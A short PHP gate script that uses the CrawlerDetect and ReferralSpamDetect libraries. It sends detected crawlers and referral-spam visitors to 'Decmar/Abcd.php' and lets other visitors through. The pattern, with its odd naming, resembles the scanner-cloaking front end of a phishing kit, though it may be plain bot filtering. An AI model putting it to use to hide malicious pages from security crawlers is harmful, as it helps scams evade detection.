<?php
require 'CrawlerDetect/Fixtures/AbstractProvider.php';
require 'CrawlerDetect/Fixtures/AbstractReff.php';
require 'CrawlerDetect/Fixtures/Crawlers.php';
require 'CrawlerDetect/Fixtures/Exclusions.php';
require 'CrawlerDetect/Fixtures/Headers.php';
require 'CrawlerDetect/Fixtures/Headerspam.php';
require 'CrawlerDetect/Fixtures/SpamReferrers.php';
require 'CrawlerDetect/CrawlerDetect.php';
require 'CrawlerDetect/ReferralSpamDetect.php';
use Jaybizzle\CrawlerDetect\CrawlerDetect;
use Jaybizzle\ReferralSpamDetect\ReferralSpamDetect;
$CrawlerDetect = new CrawlerDetect;
$omlicea03 = new ReferralSpamDetect;
if($CrawlerDetect->isCrawler()) {
header('Location: Decmar/Abcd.php');
die('');
}
if($omlicea03->isReferralSpam()) {
header('Location: Decmar/Abcd.php');
die('');
}